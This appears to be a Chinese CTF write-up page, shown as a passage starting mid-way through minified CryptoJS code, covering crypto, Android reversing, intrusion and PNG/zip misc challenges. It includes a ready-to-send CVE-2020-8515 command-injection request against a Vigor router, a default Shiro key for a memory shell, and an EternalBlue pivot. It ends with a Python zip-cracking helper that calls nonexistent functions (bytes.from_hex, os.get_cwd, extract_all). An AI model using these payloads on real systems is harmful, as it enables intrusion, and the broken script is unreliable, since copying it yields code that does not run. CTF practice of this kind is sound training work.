y.create(r).compute(t,e)},M=(P=U).lib,F=M.Base,B=M.WordArray,w=P.algo,M=w.MD5,k=w.EvpKDF=F.extend({cfg:F.extend({keySize:4,hasher:M,iterations:1}),init:function(t){this.cfg=this.cfg.extend(t)},compute:function(t,e){for(var r,i=this.cfg,n=i.hasher.create(),o=B.create(),s=o.words,c=i.keySize,a=i.iterations;s.length<c;){r&&n.update(r),r=n.update(t).finalize(e),n.reset();for(var h=1;h<a;h++)r=n.finalize(r),n.reset();o.concat(r)}return o.sigBytes=4*c,o}}),P.EvpKDF=function(t,e,r){return k.create(r).compute(t,e)},U.lib.Cipher||function(){var t=U,e=t.lib,r=e.Base,s=e.WordArray,i=e.BufferedBlockAlgorithm,n=t.enc,o=(n.Utf8,n.Base64),c=t.algo.EvpKDF,a=e.Cipher=i.extend({cfg:r.extend(),createEncryptor:function(t,e){return this.create(this._ENC_XFORM_MODE,t,e)},createDecryptor:function(t,e){return this.create(this._DEC_XFORM_MODE,t,e)},init:function(t,e,r){this.cfg=this.cfg.extend(r),this._xformMode=t,this._key=e,this.reset()},reset:function(){i.reset.call(this),this._doReset()},process:function(t){return this._append(t),this._process()},finalize:function(t){return t&&this._append(t),this._doFinalize()},keySize:4,ivSize:4,_ENC_XFORM_MODE:1,_DEC_XFORM_MODE:2,_createHelper:function(i){return{encrypt:function(t,e,r){return h(e).encrypt(i,t,e,r)},decrypt:function(t,e,r){return h(e).decrypt(i,t,e,r)}}}});function h(t){return"string"==typeof t?p:u}e.StreamCipher=a.extend({_doFinalize:function(){return this._process(!0)},blockSize:1});var l=t.mode={},n=e.BlockCipherMode=r.extend({createEncryptor:function(t,e){return this.Encryptor.create(t,e)},createDecryptor:function(t,e){return this.Decryptor.create(t,e)},init:function(t,e){this._cipher=t,this._iv=e}}),n=l.CBC=((l=n.extend()).Encryptor=l.extend({processBlock:function(t,e){var r=this._cipher,i=r.blockSize;f.call(this,t,e,i),r.encryptBlock(t,e),this._prevBlock=t.slice(e,e+i)}}),l.Decryptor=l.extend({processBlock:function(t,e){var r=this._cipher,i=r.blockSize,n=t.slice(e,e+i);r.decryptBlock(t,e),f.call(this,t,e,i),this._prevBlock=n}}),l);function f(t,e,r){var i,n=this._iv;n?(i=n,this._iv=void 0):i=this._prevBlock;for(var o=0;o<r;o++)t[e+o]^=i[o]}var l=(t.pad={}).Pkcs7={pad:function(t,e){for(var e=4*e,r=e-t.sigBytes%e,i=r<<24|r<<16|r<<8|r,n=[],o=0;o<r;o+=4)n.push(i);e=s.create(n,r);t.concat(e)},unpad:function(t){var e=255&t.words[t.sigBytes-1>>>2];t.sigBytes-=e}},d=(e.BlockCipher=a.extend({cfg:a.cfg.extend({mode:n,padding:l}),reset:function(){var t;a.reset.call(this);var e=this.cfg,r=e.iv,e=e.mode;this._xformMode==this._ENC_XFORM_MODE?t=e.createEncryptor:(t=e.createDecryptor,this._minBufferSize=1),this._mode&&this._mode.__creator==t?this._mode.init(this,r&&r.words):(this._mode=t.call(e,this,r&&r.words),this._mode.__creator=t)},_doProcessBlock:function(t,e){this._mode.processBlock(t,e)},_doFinalize:function(){var t,e=this.cfg.padding;return this._xformMode==this._ENC_XFORM_MODE?(e.pad(this._data,this.blockSize),t=this._process(!0)):(t=this._process(!0),e.unpad(t)),t},blockSize:4}),e.CipherParams=r.extend({init:function(t){this.mixIn(t)},toString:function(t){return(t||this.formatter).stringify(this)}})),l=(t.format={}).OpenSSL={stringify:function(t){var e=t.ciphertext,t=t.salt,e=t?s.create([1398893684,1701076831]).concat(t).concat(e):e;return e.toString(o)},parse:function(t){var e,r=o.parse(t),t=r.words;return 1398893684==t[0]&&1701076831==t[1]&&(e=s.create(t.slice(2,4)),t.splice(0,4),r.sigBytes-=16),d.create({ciphertext:r,salt:e})}},u=e.SerializableCipher=r.extend({cfg:r.extend({format:l}),encrypt:function(t,e,r,i){i=this.cfg.extend(i);var n=t.createEncryptor(r,i),e=n.finalize(e),n=n.cfg;return d.create({ciphertext:e,key:r,iv:n.iv,algorithm:t,mode:n.mode,padding:n.padding,blockSize:t.blockSize,formatter:i.format})},decrypt:function(t,e,r,i){return i=this.cfg.extend(i),e=this._parse(e,i.format),t.createDecryptor(r,i).finalize(e.ciphertext)},_parse:function(t,e){return"string"==typeof t?e.parse(t,this):t}}),t=(t.kdf={}).OpenSSL={execute:function(t,e,r,i){i=i||s.random(8);t=c.create({keySize:e+r}).compute(t,i),r=s.create(t.words.slice(e),4*r);return t.sigBytes=4*e,d.create({key:t,iv:r,salt:i})}},p=e.PasswordBasedCipher=u.extend({cfg:u.cfg.extend({kdf:t}),encrypt:function(t,e,r,i){r=(i=this.cfg.extend(i)).kdf.execute(r,t.keySize,t.ivSize);i.iv=r.iv;i=u.encrypt.call(this,t,e,r.key,i);return i.mixIn(r),i},decrypt:function(t,e,r,i){i=this.cfg.extend(i),e=this._parse(e,i.format);r=i.kdf.execute(r,t.keySize,t.ivSize,e.salt);return i.iv=r.iv,u.decrypt.call(this,t,e,r.key,i)}})}(),U.mode.CFB=((F=U.lib.BlockCipherMode.extend()).Encryptor=F.extend({processBlock:function(t,e){var r=this._cipher,i=r.blockSize;j.call(this,t,e,i,r),this._prevBlock=t.slice(e,e+i)}}),F.Decryptor=F.extend({processBlock:function(t,e){var r=this._cipher,i=r.blockSize,n=t.slice(e,e+i);j.call(this,t,e,i,r),this._prevBlock=n}}),F),U.mode.CTR=(M=U.lib.BlockCipherMode.extend(),P=M.Encryptor=M.extend({processBlock:function(t,e){var r=this._cipher,i=r.blockSize,n=this._iv,o=this._counter;n&&(o=this._counter=n.slice(0),this._iv=void 0);var s=o.slice(0);r.encryptBlock(s,0),o[i-1]=o[i-1]+1|0;for(var c=0;c<i;c++)t[e+c]^=s[c]}}),M.Decryptor=P,M),U.mode.CTRGladman=(F=U.lib.BlockCipherMode.extend(),P=F.Encryptor=F.extend({processBlock:function(t,e){var r=this._cipher,i=r.blockSize,n=this._iv,o=this._counter;n&&(o=this._counter=n.slice(0),this._iv=void 0),0===((n=o)[0]=T(n[0]))&&(n[1]=T(n[1]));var s=o.slice(0);r.encryptBlock(s,0);for(var c=0;c<i;c++)t[e+c]^=s[c]}}),F.Decryptor=P,F),U.mode.OFB=(M=U.lib.BlockCipherMode.extend(),P=M.Encryptor=M.extend({processBlock:function(t,e){var r=this._cipher,i=r.blockSize,n=this._iv,o=this._keystream;n&&(o=this._keystream=n.slice(0),this._iv=void 0),r.encryptBlock(o,0);for(var s=0;s<i;s++)t[e+s]^=o[s]}}),M.Decryptor=P,M),U.mode.ECB=((F=U.lib.BlockCipherMode.extend()).Encryptor=F.extend({processBlock:function(t,e){this._cipher.encryptBlock(t,e)}}),F.Decryptor=F.extend({processBlock:function(t,e){this._cipher.decryptBlock(t,e)}}),F),U.pad.AnsiX923={pad:function(t,e){var r=t.sigBytes,e=4*e,e=e-r%e,r=r+e-1;t.clamp(),t.words[r>>>2]|=e<<24-r%4*8,t.sigBytes+=e},unpad:function(t){var e=255&t.words[t.sigBytes-1>>>2];t.sigBytes-=e}},U.pad.Iso10126={pad:function(t,e){e*=4,e-=t.sigBytes%e;t.concat(U.lib.WordArray.random(e-1)).concat(U.lib.WordArray.create([e<<24],1))},unpad:function(t){var e=255&t.words[t.sigBytes-1>>>2];t.sigBytes-=e}},U.pad.Iso97971={pad:function(t,e){t.concat(U.lib.WordArray.create([2147483648],1)),U.pad.ZeroPadding.pad(t,e)},unpad:function(t){U.pad.ZeroPadding.unpad(t),t.sigBytes--}},U.pad.ZeroPadding={pad:function(t,e){e*=4;t.clamp(),t.sigBytes+=e-(t.sigBytes%e||e)},unpad:function(t){for(var e=t.words,r=t.sigBytes-1,r=t.sigBytes-1;0<=r;r--)if(e[r>>>2]>>>24-r%4*8&255){t.sigBytes=r+1;break}}},U.pad.NoPadding={pad:function(){},unpad:function(){}},m=(P=U).lib.CipherParams,C=P.enc.Hex,P.format.Hex={stringify:function(t){return t.ciphertext.toString(C)},parse:function(t){t=C.parse(t);return m.create({ciphertext:t})}},function(){var t=U,e=t.lib.BlockCipher,r=t.algo,h=[],l=[],f=[],d=[],u=[],p=[],_=[],y=[],v=[],g=[];!function(){for(var t=[],e=0;e<256;e++)t[e]=e<128?e<<1:e<<1^283;for(var r=0,i=0,e=0;e<256;e++){var n=i^i<<1^i<<2^i<<3^i<<4;h[r]=n=n>>>8^255&n^99;var o=t[l[n]=r],s=t[o],c=t[s],a=257*t[n]^16843008*n;f[r]=a<<24|a>>>8,d[r]=a<<16|a>>>16,u[r]=a<<8|a>>>24,p[r]=a,_[n]=(a=16843009*c^65537*s^257*o^16843008*r)<<24|a>>>8,y[n]=a<<16|a>>>16,v[n]=a<<8|a>>>24,g[n]=a,r?(r=o^t[t[t[c^o]]],i^=t[t[i]]):r=i=1}}();var B=[0,1,2,4,8,16,32,64,128,27,54],r=r.AES=e.extend({_doReset:function(){if(!this._nRounds||this._keyPriorReset!==this._key){for(var t=this._keyPriorReset=this._key,e=t.words,r=t.sigBytes/4,i=4*(1+(this._nRounds=6+r)),n=this._keySchedule=[],o=0;o<i;o++)o<r?n[o]=e[o]:(a=n[o-1],o%r?6<r&&o%r==4&&(a=h[a>>>24]<<24|h[a>>>16&255]<<16|h[a>>>8&255]<<8|h[255&a]):(a=h[(a=a<<8|a>>>24)>>>24]<<24|h[a>>>16&255]<<16|h[a>>>8&255]<<8|h[255&a],a^=B[o/r|0]<<24),n[o]=n[o-r]^a);for(var s=this._invKeySchedule=[],c=0;c<i;c++){var a,o=i-c;a=c%4?n[o]:n[o-4],s[c]=c<4||o<=4?a:_[h[a>>>24]]^y[h[a>>>16&255]]^v[h[a>>>8&255]]^g[h[255&a]]}}},encryptBlock:function(t,e){this._doCryptBlock(t,e,this._keySchedule,f,d,u,p,h)},decryptBlock:function(t,e){var r=t[e+1];t[e+1]=t[e+3],t[e+3]=r,this._doCryptBlock(t,e,this._invKeySchedule,_,y,v,g,l);r=t[e+1];t[e+1]=t[e+3],t[e+3]=r},_doCryptBlock:function(t,e,r,i,n,o,s,c){for(var a=this._nRounds,h=t[e]^r[0],l=t[e+1]^r[1],f=t[e+2]^r[2],d=t[e+3]^r[3],u=4,p=1;p<a;p++)var _=i[h>>>24]^n[l>>>16&255]^o[f>>>8&255]^s[255&d]^r[u++],y=i[l>>>24]^n[f>>>16&255]^o[d>>>8&255]^s[255&h]^r[u++],v=i[f>>>24]^n[d>>>16&255]^o[h>>>8&255]^s[255&l]^r[u++],g=i[d>>>24]^n[h>>>16&255]^o[l>>>8&255]^s[255&f]^r[u++],h=_,l=y,f=v,d=g;_=(c[h>>>24]<<24|c[l>>>16&255]<<16|c[f>>>8&255]<<8|c[255&d])^r[u++],y=(c[l>>>24]<<24|c[f>>>16&255]<<16|c[d>>>8&255]<<8|c[255&h])^r[u++],v=(c[f>>>24]<<24|c[d>>>16&255]<<16|c[h>>>8&255]<<8|c[255&l])^r[u++],g=(c[d>>>24]<<24|c[h>>>16&255]<<16|c[l>>>8&255]<<8|c[255&f])^r[u++];t[e]=_,t[e+1]=y,t[e+2]=v,t[e+3]=g},keySize:8});t.AES=e._createHelper(r)}(),function(){var t=U,e=t.lib,i=e.WordArray,r=e.BlockCipher,e=t.algo,h=[57,49,41,33,25,17,9,1,58,50,42,34,26,18,10,2,59,51,43,35,27,19,11,3,60,52,44,36,63,55,47,39,31,23,15,7,62,54,46,38,30,22,14,6,61,53,45,37,29,21,13,5,28,20,12,4],l=[14,17,11,24,1,5,3,28,15,6,21,10,23,19,12,4,26,8,16,7,27,20,13,2,41,52,31,37,47,55,30,40,51,45,33,48,44,49,39,56,34,53,46,42,50,36,29,32],f=[1,2,4,6,8,10,12,14,15,17,19,21,23,25,27,28],d=[{0:8421888,268435456:32768,536870912:8421378,805306368:2,1073741824:512,1342177280:8421890,1610612736:8389122,1879048192:8388608,2147483648:514,2415919104:8389120,2684354560:33280,2952790016:8421376,3221225472:32770,3489660928:8388610,3758096384:0,4026531840:33282,134217728:0,402653184:8421890,671088640:33282,939524096:32768,1207959552:8421888,1476395008:512,1744830464:8421378,2013265920:2,2281701376:8389120,2550136832:33280,2818572288:8421376,3087007744:8389122,3355443200:8388610,3623878656:32770,3892314112:514,4160749568:8388608,1:32768,268435457:2,536870913:8421888,805306369:8388608,1073741825:8421378,1342177281:33280,1610612737:512,1879048193:8389122,2147483649:8421890,2415919105:8421376,2684354561:8388610,2952790017:33282,3221225473:514,3489660929:8389120,3758096385:32770,4026531841:0,134217729:8421890,402653185:8421376,671088641:8388608,939524097:512,1207959553:32768,1476395009:8388610,1744830465:2,2013265921:33282,2281701377:32770,2550136833:8389122,2818572289:514,3087007745:8421888,3355443201:8389120,3623878657:0,3892314113:33280,4160749569:8421378},{0:1074282512,16777216:16384,33554432:524288,50331648:1074266128,67108864:1073741840,83886080:1074282496,100663296:1073758208,117440512:16,134217728:540672,150994944:1073758224,167772160:1073741824,184549376:540688,201326592:524304,218103808:0,234881024:16400,251658240:1074266112,8388608:1073758208,25165824:540688,41943040:16,58720256:1073758224,75497472:1074282512,92274688:1073741824,109051904:524288,125829120:1074266128,142606336:524304,159383552:0,176160768:16384,192937984:1074266112,209715200:1073741840,226492416:540672,243269632:1074282496,260046848:16400,268435456:0,285212672:1074266128,301989888:1073758224,318767104:1074282496,335544320:1074266112,352321536:16,369098752:540688,385875968:16384,402653184:16400,419430400:524288,436207616:524304,452984832:1073741840,469762048:540672,486539264:1073758208,503316480:1073741824,520093696:1074282512,276824064:540688,293601280:524288,310378496:1074266112,327155712:16384,343932928:1073758208,360710144:1074282512,377487360:16,394264576:1073741824,411041792:1074282496,427819008:1073741840,444596224:1073758224,461373440:524304,478150656:0,494927872:16400,511705088:1074266128,528482304:540672},{0:260,1048576:0,2097152:67109120,3145728:65796,4194304:65540,5242880:67108868,6291456:67174660,7340032:67174400,8388608:67108864,9437184:67174656,10485760:65792,11534336:67174404,12582912:67109124,13631488:65536,14680064:4,15728640:256,524288:67174656,1572864:67174404,2621440:0,3670016:67109120,4718592:67108868,5767168:65536,6815744:65540,7864320:260,8912896:4,9961472:256,11010048:67174400,12058624:65796,13107200:65792,14155776:67109124,15204352:67174660,16252928:67108864,16777216:67174656,17825792:65540,18874368:65536,19922944:67109120,20971520:256,22020096:67174660,23068672:67108868,24117248:0,25165824:67109124,26214400:67108864,27262976:4,28311552:65792,29360128:67174400,30408704:260,31457280:65796,32505856:67174404,17301504:67108864,18350080:260,19398656:67174656,20447232:0,21495808:65540,22544384:67109120,23592960:256,24641536:67174404,25690112:65536,26738688:67174660,27787264:65796,28835840:67108868,29884416:67109124,30932992:67174400,31981568:4,33030144:65792},{0:2151682048,65536:2147487808,131072:4198464,196608:2151677952,262144:0,327680:4198400,393216:2147483712,458752:4194368,524288:2147483648,589824:4194304,655360:64,720896:2147487744,786432:2151678016,851968:4160,917504:4096,983040:2151682112,32768:2147487808,98304:64,163840:2151678016,229376:2147487744,294912:4198400,360448:2151682112,425984:0,491520:2151677952,557056:4096,622592:2151682048,688128:4194304,753664:4160,819200:2147483648,884736:4194368,950272:4198464,1015808:2147483712,1048576:4194368,1114112:4198400,1179648:2147483712,1245184:0,1310720:4160,1376256:2151678016,1441792:2151682048,1507328:2147487808,1572864:2151682112,1638400:2147483648,1703936:2151677952,1769472:4198464,1835008:2147487744,1900544:4194304,1966080:64,2031616:4096,1081344:2151677952,1146880:2151682112,1212416:0,1277952:4198400,1343488:4194368,1409024:2147483648,1474560:2147487808,1540096:64,1605632:2147483712,1671168:4096,1736704:2147487744,1802240:2151678016,1867776:4160,1933312:2151682048,1998848:4194304,2064384:4198464},{0:128,4096:17039360,8192:262144,12288:536870912,16384:537133184,20480:16777344,24576:553648256,28672:262272,32768:16777216,36864:537133056,40960:536871040,45056:553910400,49152:553910272,53248:0,57344:17039488,61440:553648128,2048:17039488,6144:553648256,10240:128,14336:17039360,18432:262144,22528:537133184,26624:553910272,30720:536870912,34816:537133056,38912:0,43008:553910400,47104:16777344,51200:536871040,55296:553648128,59392:16777216,63488:262272,65536:262144,69632:128,73728:536870912,77824:553648256,81920:16777344,86016:553910272,90112:537133184,94208:16777216,98304:553910400,102400:553648128,106496:17039360,110592:537133056,114688:262272,118784:536871040,122880:0,126976:17039488,67584:553648256,71680:16777216,75776:17039360,79872:537133184,83968:536870912,88064:17039488,92160:128,96256:553910272,100352:262272,104448:553910400,108544:0,112640:553648128,116736:16777344,120832:262144,124928:537133056,129024:536871040},{0:268435464,256:8192,512:270532608,768:270540808,1024:268443648,1280:2097152,1536:2097160,1792:268435456,2048:0,2304:268443656,2560:2105344,2816:8,3072:270532616,3328:2105352,3584:8200,3840:270540800,128:270532608,384:270540808,640:8,896:2097152,1152:2105352,1408:268435464,1664:268443648,1920:8200,2176:2097160,2432:8192,2688:268443656,2944:270532616,3200:0,3456:270540800,3712:2105344,3968:268435456,4096:268443648,4352:270532616,4608:270540808,4864:8200,5120:2097152,5376:268435456,5632:268435464,5888:2105344,6144:2105352,6400:0,6656:8,6912:270532608,7168:8192,7424:268443656,7680:270540800,7936:2097160,4224:8,4480:2105344,4736:2097152,4992:268435464,5248:268443648,5504:8200,5760:270540808,6016:270532608,6272:270540800,6528:270532616,6784:8192,7040:2105352,7296:2097160,7552:0,7808:268435456,8064:268443656},{0:1048576,16:33555457,32:1024,48:1049601,64:34604033,80:0,96:1,112:34603009,128:33555456,144:1048577,160:33554433,176:34604032,192:34603008,208:1025,224:1049600,240:33554432,8:34603009,24:0,40:33555457,56:34604032,72:1048576,88:33554433,104:33554432,120:1025,136:1049601,152:33555456,168:34603008,184:1048577,200:1024,216:34604033,232:1,248:1049600,256:33554432,272:1048576,288:33555457,304:34603009,320:1048577,336:33555456,352:34604032,368:1049601,384:1025,400:34604033,416:1049600,432:1,448:0,464:34603008,480:33554433,496:1024,264:1049600,280:33555457,296:34603009,312:1,328:33554432,344:1048576,360:1025,376:34604032,392:33554433,408:34603008,424:0,440:34604033,456:1049601,472:1024,488:33555456,504:1048577},{0:134219808,1:131072,2:134217728,3:32,4:131104,5:134350880,6:134350848,7:2048,8:134348800,9:134219776,10:133120,11:134348832,12:2080,13:0,14:134217760,15:133152,2147483648:2048,2147483649:134350880,2147483650:134219808,2147483651:134217728,2147483652:134348800,2147483653:133120,2147483654:133152,2147483655:32,2147483656:134217760,2147483657:2080,2147483658:131104,2147483659:134350848,2147483660:0,2147483661:134348832,2147483662:134219776,2147483663:131072,16:133152,17:134350848,18:32,19:2048,20:134219776,21:134217760,22:134348832,23:131072,24:0,25:131104,26:134348800,27:134219808,28:134350880,29:133120,30:2080,31:134217728,2147483664:131072,2147483665:2048,2147483666:134348832,2147483667:133152,2147483668:32,2147483669:134348800,2147483670:134217728,2147483671:134219808,2147483672:134350880,2147483673:134217760,2147483674:134219776,2147483675:0,2147483676:133120,2147483677:2080,2147483678:131104,2147483679:134350848}],u=[4160749569,528482304,33030144,2064384,129024,8064,504,2147483679],n=e.DES=r.extend({_doReset:function(){for(var t=this._key.words,e=[],r=0;r<56;r++){var i=h[r]-1;e[r]=t[i>>>5]>>>31-i%32&1}for(var n=this._subKeys=[],o=0;o<16;o++){for(var s=n[o]=[],c=f[o],r=0;r<24;r++)s[r/6|0]|=e[(l[r]-1+c)%28]<<31-r%6,s[4+(r/6|0)]|=e[28+(l[r+24]-1+c)%28]<<31-r%6;s[0]=s[0]<<1|s[0]>>>31;for(r=1;r<7;r++)s[r]=s[r]>>>4*(r-1)+3;s[7]=s[7]<<5|s[7]>>>27}for(var a=this._invSubKeys=[],r=0;r<16;r++)a[r]=n[15-r]},encryptBlock:function(t,e){this._doCryptBlock(t,e,this._subKeys)},decryptBlock:function(t,e){this._doCryptBlock(t,e,this._invSubKeys)},_doCryptBlock:function(t,e,r){this._lBlock=t[e],this._rBlock=t[e+1],p.call(this,4,252645135),p.call(this,16,65535),_.call(this,2,858993459),_.call(this,8,16711935),p.call(this,1,1431655765);for(var i=0;i<16;i++){for(var n=r[i],o=this._lBlock,s=this._rBlock,c=0,a=0;a<8;a++)c|=d[a][((s^n[a])&u[a])>>>0];this._lBlock=s,this._rBlock=o^c}var h=this._lBlock;this._lBlock=this._rBlock,this._rBlock=h,p.call(this,1,1431655765),_.call(this,8,16711935),_.call(this,2,858993459),p.call(this,16,65535),p.call(this,4,252645135),t[e]=this._lBlock,t[e+1]=this._rBlock},keySize:2,ivSize:2,blockSize:2});function p(t,e){e=(this._lBlock>>>t^this._rBlock)&e;this._rBlock^=e,this._lBlock^=e<<t}function _(t,e){e=(this._rBlock>>>t^this._lBlock)&e;this._lBlock^=e,this._rBlock^=e<<t}t.DES=r._createHelper(n);e=e.TripleDES=r.extend({_doReset:function(){var t=this._key.words;if(2!==t.length&&4!==t.length&&t.length<6)throw new Error("Invalid key length - 3DES requires the key length to be 64, 128, 192 or >192.");var e=t.slice(0,2),r=t.length<4?t.slice(0,2):t.slice(2,4),t=t.length<6?t.slice(0,2):t.slice(4,6);this._des1=n.createEncryptor(i.create(e)),this._des2=n.createEncryptor(i.create(r)),this._des3=n.createEncryptor(i.create(t))},encryptBlock:function(t,e){this._des1.encryptBlock(t,e),this._des2.decryptBlock(t,e),this._des3.encryptBlock(t,e)},decryptBlock:function(t,e){this._des3.decryptBlock(t,e),this._des2.encryptBlock(t,e),this._des1.decryptBlock(t,e)},keySize:6,ivSize:2,blockSize:2});t.TripleDES=r._createHelper(e)}(),function(){var t=U,e=t.lib.StreamCipher,r=t.algo,i=r.RC4=e.extend({_doReset:function(){for(var t=this._key,e=t.words,r=t.sigBytes,i=this._S=[],n=0;n<256;n++)i[n]=n;for(var n=0,o=0;n<256;n++){var s=n%r,s=e[s>>>2]>>>24-s%4*8&255,o=(o+i[n]+s)%256,s=i[n];i[n]=i[o],i[o]=s}this._i=this._j=0},_doProcessBlock:function(t,e){t[e]^=n.call(this)},keySize:8,ivSize:0});function n(){for(var t=this._S,e=this._i,r=this._j,i=0,n=0;n<4;n++){var r=(r+t[e=(e+1)%256])%256,o=t[e];t[e]=t[r],t[r]=o,i|=t[(t[e]+t[r])%256]<<24-8*n}return this._i=e,this._j=r,i}t.RC4=e._createHelper(i);r=r.RC4Drop=i.extend({cfg:i.cfg.extend({drop:192}),_doReset:function(){i._doReset.call(this);for(var t=this.cfg.drop;0<t;t--)n.call(this)}});t.RC4Drop=e._createHelper(r)}(),F=(M=U).lib.StreamCipher,P=M.algo,D=[],E=[],R=[],P=P.Rabbit=F.extend({_doReset:function(){for(var t=this._key.words,e=this.cfg.iv,r=0;r<4;r++)t[r]=16711935&(t[r]<<8|t[r]>>>24)|4278255360&(t[r]<<24|t[r]>>>8);for(var i=this._X=[t[0],t[3]<<16|t[2]>>>16,t[1],t[0]<<16|t[3]>>>16,t[2],t[1]<<16|t[0]>>>16,t[3],t[2]<<16|t[1]>>>16],n=this._C=[t[2]<<16|t[2]>>>16,4294901760&t[0]|65535&t[1],t[3]<<16|t[3]>>>16,4294901760&t[1]|65535&t[2],t[0]<<16|t[0]>>>16,4294901760&t[2]|65535&t[3],t[1]<<16|t[1]>>>16,4294901760&t[3]|65535&t[0]],r=this._b=0;r<4;r++)N.call(this);for(r=0;r<8;r++)n[r]^=i[r+4&7];if(e){var o=e.words,s=o[0],c=o[1],e=16711935&(s<<8|s>>>24)|4278255360&(s<<24|s>>>8),o=16711935&(c<<8|c>>>24)|4278255360&(c<<24|c>>>8),s=e>>>16|4294901760&o,c=o<<16|65535&e;n[0]^=e,n[1]^=s,n[2]^=o,n[3]^=c,n[4]^=e,n[5]^=s,n[6]^=o,n[7]^=c;for(r=0;r<4;r++)N.call(this)}},_doProcessBlock:function(t,e){var r=this._X;N.call(this),D[0]=r[0]^r[5]>>>16^r[3]<<16,D[1]=r[2]^r[7]>>>16^r[5]<<16,D[2]=r[4]^r[1]>>>16^r[7]<<16,D[3]=r[6]^r[3]>>>16^r[1]<<16;for(var i=0;i<4;i++)D[i]=16711935&(D[i]<<8|D[i]>>>24)|4278255360&(D[i]<<24|D[i]>>>8),t[e+i]^=D[i]},blockSize:4,ivSize:2}),M.Rabbit=F._createHelper(P),F=(M=U).lib.StreamCipher,P=M.algo,W=[],O=[],I=[],P=P.RabbitLegacy=F.extend({_doReset:function(){for(var t=this._key.words,e=this.cfg.iv,r=this._X=[t[0],t[3]<<16|t[2]>>>16,t[1],t[0]<<16|t[3]>>>16,t[2],t[1]<<16|t[0]>>>16,t[3],t[2]<<16|t[1]>>>16],i=this._C=[t[2]<<16|t[2]>>>16,4294901760&t[0]|65535&t[1],t[3]<<16|t[3]>>>16,4294901760&t[1]|65535&t[2],t[0]<<16|t[0]>>>16,4294901760&t[2]|65535&t[3],t[1]<<16|t[1]>>>16,4294901760&t[3]|65535&t[0]],n=this._b=0;n<4;n++)q.call(this);for(n=0;n<8;n++)i[n]^=r[n+4&7];if(e){var o=e.words,s=o[0],t=o[1],e=16711935&(s<<8|s>>>24)|4278255360&(s<<24|s>>>8),o=16711935&(t<<8|t>>>24)|4278255360&(t<<24|t>>>8),s=e>>>16|4294901760&o,t=o<<16|65535&e;i[0]^=e,i[1]^=s,i[2]^=o,i[3]^=t,i[4]^=e,i[5]^=s,i[6]^=o,i[7]^=t;for(n=0;n<4;n++)q.call(this)}},_doProcessBlock:function(t,e){var r=this._X;q.call(this),W[0]=r[0]^r[5]>>>16^r[3]<<16,W[1]=r[2]^r[7]>>>16^r[5]<<16,W[2]=r[4]^r[1]>>>16^r[7]<<16,W[3]=r[6]^r[3]>>>16^r[1]<<16;for(var i=0;i<4;i++)W[i]=16711935&(W[i]<<8|W[i]>>>24)|4278255360&(W[i]<<24|W[i]>>>8),t[e+i]^=W[i]},blockSize:4,ivSize:2}),M.RabbitLegacy=F._createHelper(P),U});
var enc = "LrcNR2XwpNQMORyv85ae1GY16H3aKPkdSyAhv726TgNNTukxUmYvFb0XNnT4QWAZ";
var REQ = "bool";
alert(CryptoJS.AES.decrypt(enc, CryptoJS.enc.Utf8.parse(REQ), {
              mode : CryptoJS.mode.ECB,
              padding : CryptoJS.pad.Pkcs7
            }).toString(CryptoJS.enc.Utf8));

直接跑js代码exp即得flag:flag{39383121F5545635A5EE13C356F8AA18}

REVERSE

简单逆向

ida打开直接有

安卓逆向工程

image

    public void ch3ckflag() {
        if (DonUtils.c(sin() + this.editText.getText().toString() + c().substring(22, 41)).replaceAll("\\s+", "").equals("ZjgyNWFiMGE3ZTlkYjFmZDNlZmUxZDliMzI1MzcxZWJObVlMcklJb0w2ZmFBckprQmhjM05aUkdObVJXWjBhVTlxYw==")) {
            Toast.makeText(this, "flag{" + this.editText.getText().toString() + "}", 0).show();
        } else {
            Toast.makeText(this, "wrong", 0).show();
        }
    }

    public static String getMD5(PackageManager packageManager, String str) {
        try {
            Signature signature = packageManager.getPackageInfo(str, 64).signatures[0];
            MessageDigest messageDigest = MessageDigest.getInstance("MD5");
            messageDigest.update(signature.toByteArray());
            byte[] digest = messageDigest.digest();
            StringBuilder sb = new StringBuilder();
            for (byte b : digest) {
                sb.append(Integer.toString((b & UByte.MAX_VALUE) + 256, 16).substring(1));
            }
            return sb.toString();
        } catch (PackageManager.NameNotFoundException | NoSuchAlgorithmException e) {
            e.printStackTrace();
            return null;
        }
    }

    public String sin() {
        return getMD5(getPackageManager(), DonUtils.d("Y29tLmhhaGFoYS5rZWVwc2ltcGxl"));
    }

md5 + flag + str,故那个base64解码后中间部分就是 flag

md5 32字节,str 19字节,掐头去尾获得 flag:flag{NmYLrIIoL6faArJk}

智能制造

业务系统

直接shiro打个内存马,key是默认的:

kPH+bIxk5D2deZiIxcaaaA==

flag在/root/flag.txt​:

image

智能智造上位机

直接拿刚才的shiro机器frp搭个隧道代理出来当跳板msf永恒之蓝直接梭了,flag在C:\Users\Administrators\Desktop\flag.txt

vigor_router_路由器

CVE-2020-8515​,POC直接发包打:

POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: 192.26.2.142
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

action=login&keyPath=%27%0acat${IFS}/flag.txt%0a%27&loginUser=TenMap1e&loginPwd=TenMap1e

flag:flag{HJJIJOOMHHNBSEL}。

image

参考链接:

凌武科技wp:https://mp.weixin.qq.com/s/6hTkh97g4otSAI5sv9mJsg

1cepeak(冰峰✌)wp:https://1cepeak.cn/

DASCTF 2024暑期挑战赛|为热爱,并肩作战 Misc 部分 WriteUp by Mini-Venom

不是鸽们,真有人为热爱而战啊???

png_master

image

image

有两个可疑的地方,先看第一个,有一段base64

image

image

得到第一段flag

第二个是IDAT块异常,导出看一下

image

补全文件头文件尾爆破PNG宽高:

image

得到了第三段flag

中间缺一部分,把原图拖进stegsolve查看发现alpha plane 0-7左上角均有异常,勾选查看:

image

得到第二部分flag

拼接起来:

DASCTF{2fd9e9ff-e27d-5405-c5f5-a19131f86216}

Ez_zip

简单修复一下:

image

image

有注释,just a byte

这个地方应该是说密码是byte的意思,所以爆破也挺简单的

遛一遛GPT

import os
import pyzipper

def decrypt_archive_with_hex_key(archive_path, hex_key):
    """Attempts to decrypt a zip file using the given hexadecimal key."""
    cipher_key = bytes.from_hex(hex_key)
    current_dir = os.get_cwd()

    with pyzipper.AESZipFile(archive_path) as encrypted_archive:
        encrypted_archive.setpassword(cipher_key)
        os.chdir(current_dir)
        try:
            encrypted_archive.extract_all()
            log_message = f"Decryption successful for '{archive_path}' with key: {hex_key}"
            print(log_message)
            record_decryption_key(hex_key)
            return True
        except RuntimeError:
            # Optionally log decryption failures here
            pass
        finally:
            os.chdir(current_dir)

def record_decryption_key(decryption_key):
    """Records the decryption key used for a successful decryption."""
    with open('decryptionKeys.txt', 'a') as key_file:
        key_file.write(str(bytes.from_hex(decryption_key)) + '\n')

